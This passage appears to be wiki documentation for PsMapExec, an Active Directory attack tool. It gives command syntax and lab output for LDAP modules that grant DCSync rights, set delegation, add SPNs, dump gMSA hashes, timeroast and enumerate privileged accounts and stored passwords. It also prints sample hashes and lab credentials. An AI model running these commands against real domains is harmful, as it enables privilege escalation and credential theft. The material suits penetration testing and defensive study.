PS > PsMapExec ldap -Targets DC01 -Module RemoveFromGroup -GroupDN "CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL" -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully removed CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL from CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL

SPN Management

AddSPN

Adds a new random SPN to the target account

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module AddSPN

PS > PsMapExec ldap -Targets DC01 -Module AddSPN -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully set SPN "cifs/J30ZiozDkMQL4qbd.domain.com" for CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

RemoveSPN

Removes ALL SPNs from the target account

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module RemoveSPN

PS > PsMapExec ldap -Targets DC01 -Module RemoveSPN -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully Unset SPNs for CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

Delegation Management

AddRBCD

Grant a trustee (-SID S-1-5-21-55... ) ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity to the specified account

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -SID [SID] -Module AddRBCD

PS > PsMapExec ldap -Targets DC01 -Module AddRBCD -TargetDN "CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL" -SID "S-1-5-21-1201573619-2117991115-2379797238-1120"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[+] msDS-AllowedToActOnBehalfOfOtherIdentity successfully added on "CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL" for SID: S-1-5-21-1201573619-2117991115-2379797238-1120

ConstrainedDelegation

Enumerate user and computer objects configured for constrained delegation

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module ConstrainedDelegation

PS > PsMapExec LDAP -Targets winterfell -domain north.sevenkingdoms.local -module ConstrainedDelegation

LDAP   192.168.56.11   WINTERFELL     NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users with Constrained Delegation

Name                : jon.snow
Enabled             : True
AllowedToDelegateTo : CIFS/winterfell;CIFS/winterfell.north.sevenkingdoms.local

[*] Computers with Constrained Delegation

Name                : CASTELBLACK$
FQDN                : castelblack.north.sevenkingdoms.local
OperatingSystem     : Windows Server 2019 Datacenter Evaluation
Enabled             : True
AllowedToDelegateTo : HTTP/winterfell;HTTP/winterfell.north.sevenkingdoms.local

RemoveRBCD

Clears the ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute the for target.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module AddRBCD

PS > PsMapExec ldap -Targets DC01 -Module RemoveRBCD -TargetDN "CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[+] msDS-AllowedToActOnBehalfOfOtherIdentity Removed from CN=MSSQL01,CN=Computers,DC=SECURITY,DC=LOCAL

UnconstrainedDelegation

Enumerate user and computer objects configured for unconstrained delegation

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -module unconstrainedDelegation

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -module unconstrainedDelegation

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Unconstrained Delegation Users

No users found with unconstrained delegation.

[*] Unconstrained Delegation Computers

Name          OperatingSystem                           Enabled IPAddress       DC
----          ---------------                           ------- ---------       --
KINGSLANDING$ Windows Server 2019 Datacenter Evaluation    True 192.168.56.10 True
REDKEEP$      Windows Server 2019 Standard                 True 192.168.56.30 True

Information Gathering

AdminCount

Obtains each user and group with AdminCount=1 set.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module AdminCount

PS C:\Users\moe\Desktop> PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module AdminCount

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] AdminCount=1 Users

admin_2
Administrator
cersei.lannister
krbtgt
Moe
robert.baratheon
vagrant

[*] AdminCount=1 Groups
Account Operators
Administrators
Backup Operators
Domain Admins
Domain Controllers
DragonRider
Enterprise Admins
Enterprise Key Admins

ComputerSIDs

Obtains each computer SID in the domain

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module ComputerSIDs

PS C:\Users\moe\Desktop> PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module ComputerSIDs

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Computer SIDs

sAMAccountName SID
-------------- ---
BVMDWWEQ$      S-1-5-21-4056014253-3096967110-678733760-1187
CASTERLYROCK$  S-1-5-21-4056014253-3096967110-678733760-1126
DRAGONSTONE$   S-1-5-21-4056014253-3096967110-678733760-1124
Evil_127b$     S-1-5-21-4056014253-3096967110-678733760-1182
Evil_bHx7$     S-1-5-21-4056014253-3096967110-678733760-1604

MAQ

Gets the domain Machine Account Quota value.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module MAQ

PS > PsMapExec ldap -Targets DC01.Security.local -Module maq

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

Machine Account Quota: 10

UserDescriptions

Obtains each user that has a description.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserDescriptions

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -u rc4 -p Password123 -Module UserDescriptions

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users with Description

sAMAccountName    Description
--------------    -----------
Administrator     Built-in account for administering the computer/domain
cersei.lannister  Cersei Lanister
Guest             Built-in account for guest access to the computer/domain
jaime.lannister   Jaime Lanister
joffrey.baratheon Joffrey Baratheon
krbtgt            Key Distribution Center Service Account
lord.varys        Lord Varys
lysa.arryn        Lysa Arryn
maester.pycelle   Maester Pycelle

UserLogonRestrictions

Obtains each user that has logon restrictions applied

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserLogonRestrictions

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module UserLogonRestrictions

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users Logon Restrictions

sAMAccountName AllowedToLogon
-------------- --------------
admin_1        the-eyrie

UserPasswords

Obtains each user that has the userPassword or unixUserPassword attribute populated.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserPasswords

PS > PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -u rc4 -p Password123 -Module UserPasswords

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users SIDs

sAMAccountName userPassword unixPassword
-------------- ------------ ------------
admin_1        Password123     Un1xPass!

UserSIDs

Obtains each user SID in the domain

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module UserSIDs

PS C:\Users\moe\Desktop> PsMapExec LDAP -Targets kingslanding -domain sevenkingdoms.local -Module UserSIDs

LDAP   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

[*] Users SIDs

sAMAccountName       SID
--------------       ---
$V31000-ECFT78ITR5GR S-1-5-21-4056014253-3096967110-678733760-1151
admin_1              S-1-5-21-4056014253-3096967110-678733760-1173
admin_2              S-1-5-21-4056014253-3096967110-678733760-1181
Administrator        S-1-5-21-4056014253-3096967110-678733760-500
cersei.lannister     S-1-5-21-4056014253-3096967110-678733760-1115
ESSOS$               S-1-5-21-4056014253-3096967110-678733760-1105
Guest                S-1-5-21-4056014253-3096967110-678733760-501

Privilege Escalation

Elevate

Elevates the specified account to perform DCSync within the targeted DC's domain.

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -TargetDN [TargetDN] -Module Elevate

PS > PsMapExec ldap -Targets DC01 -Module Elevate -TargetDN "CN=Mendez,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Retrieving SID of user 
[*] User SID: S-1-5-21-1201573619-2117991115-2379797238-1120
[*] Domain DN: DC=SECURITY,DC=LOCAL
[*] Retrieving security descriptor for domain DC=SECURITY,DC=LOCAL
[*] Retrieved current security descriptor
[*] Added DCSync ACEs to security descriptor
[+] Successfully granted DCSync rights to CN=Mendez,CN=Users,DC=SECURITY,DC=LOCAL

Credential Extraction

GMSA

Dumps GMSA credentials

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -Module GMSA

PS > PsMapExec ldap -Targets MEEREEN -Username "BRAAVOS$" -Hash 216510998B7C442ED7A48362F067959F -Module GMSA

LDAP   192.168.56.12   MEEREEN   ESSOS.LOCAL   Windows Server 2016 Standard Evaluation     [+] SUCCESS

Authenticated to MEEREEN.ESSOS.LOCAL as ESSOS\BRAAVOS$

GMSA Account         : ESSOS.LOCAL\gmsaDragon$
Password valid until : 10/09/2025 14:54:59

rc4_hmac             : 85b952359bee0656b74f4259810f7cad
aes128_cts_hmac_sha1 : c985f4f4d9c2b033bbff1feb25b5aa22
aes256_cts_hmac_sha1 : 25430549f280401c239c175588c1f8e9b0cbd44e9496e4e0c54b9d03d18c5aca
des_cbc_md5          : efa47ab31ae0d92f

TimeRoast

Performs authenticated timeroasting. Output for this module will be written to $pwd\PME\TimeRoast

PsMapExec LDAP -Targets [Target] -Domain [Domain] -Module timeroast -ShowOutput

PS > PsMapExec ldap -Targets DC01 -Module timeroast -ShowOutput

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

DC01:$sntp-ms$85ea8c46717179c44e2d4358d9fafef1$1c0111e900000000000a153a4c4f434cebd887...
WS01:$sntp-ms$f87f9cb07b5979b50193fa4614263103$1c0111e900000000000a153a4c4f434cebd887...
SECURITY-CA:$sntp-ms$75feee7f3fddb4a038737993000675f6$1c0111e900000000000a153a4c4f434...
WS-APPLOCKER:$sntp-ms$337efdb73a5e4f938d2a26302d8085de$1c0111e900000000000a153a4c4f43...
SRV2012:$sntp-ms$d8cd7853133544cfec03ffc87be5df98$1c0111e900000000000a153a4c4f434cebd...

Authentication & Validation

whoami

Validates the authenticating user to the LDAP server.

PsMapExec LDAP -Targets [Target] -Domain [Domain] -Module whoami

PS > PsMapExec LDAP -Targets all -Domain essos.local -Username khal.drogo -Password horse -Module whoami

LDAP   192.168.56.12   MEEREEN   ESSOS.LOCAL   Windows Server 2016 Standard Evaluation     [+] SUCCESS

 Authenticated as ESSOS\khal.drogo

Uh oh!

04 ‐ Modules

Overview

⚔️ All Modules (Excluding LDAP)

📜 LDAP Modules

🔑 Dump Creds

🏴‍☠️ Pillaging

👥 Logon Session Abuse

❓ Other

> Amnesiac

Description

Optional Parameters

Usage

> Console History

Description

Optional Parameters

Usage

> DPAPI

Description

Optional Parameters

Usage

> EventCreds

Optional Parameters

Usage

> eKeys

Optional Parameters

Usage

Parsing

> Files

Description

Optional Parameters

Usage

> FileZilla

Description

Optional Parameters

Usage

> KerbDump

Optional Parameters

Usage

Parsing

> LogonPasswords

Optional Parameters

Usage

Parsing

> LSA

Optional Parameters

Usage

> MDF

Usage

> Notepad

Optional Parameters

Usage

> Example Output

> NTDS

Optional Parameters

Usage

Parsing

Purpose of Parsing

> RDP

Optional Parameters

Usage

> NTLM

Optional Parameters

Usage

Parsing

> SAM

Optional Parameters

Usage

Parsing

> SCCM

Optional Parameters

Usage

Parsing

> SessionExec

Optional Parameters

Usage

> SessionRelay

Optional Parameters

Usage

> Snipped